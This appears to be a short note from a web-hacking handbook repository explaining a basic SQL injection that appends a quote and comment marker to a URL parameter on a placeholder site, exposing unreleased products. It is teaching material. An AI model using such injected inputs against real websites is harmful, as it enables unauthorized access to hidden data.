handbook/tools/3.Web-Hacking/4.Injection/SQL/Commands/SQL-injection/1 - Retrieving Hidden Data.md
2024-08-31 01:07:22 +02:00

16 lines
435 B
Markdown

## Retrieving Hidden Data
Target URL: https://insecure-website.com/products?category=Gifts
```
SELECT * FROM products WHERE category = 'Gifts' AND released = 1
```
Exploit URL: https://insecure-website.com/products?category=Gifts' --
```
SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1
```
- -- is a comment indicator in SQL
In Result, all produces are displayed -> including unreleased products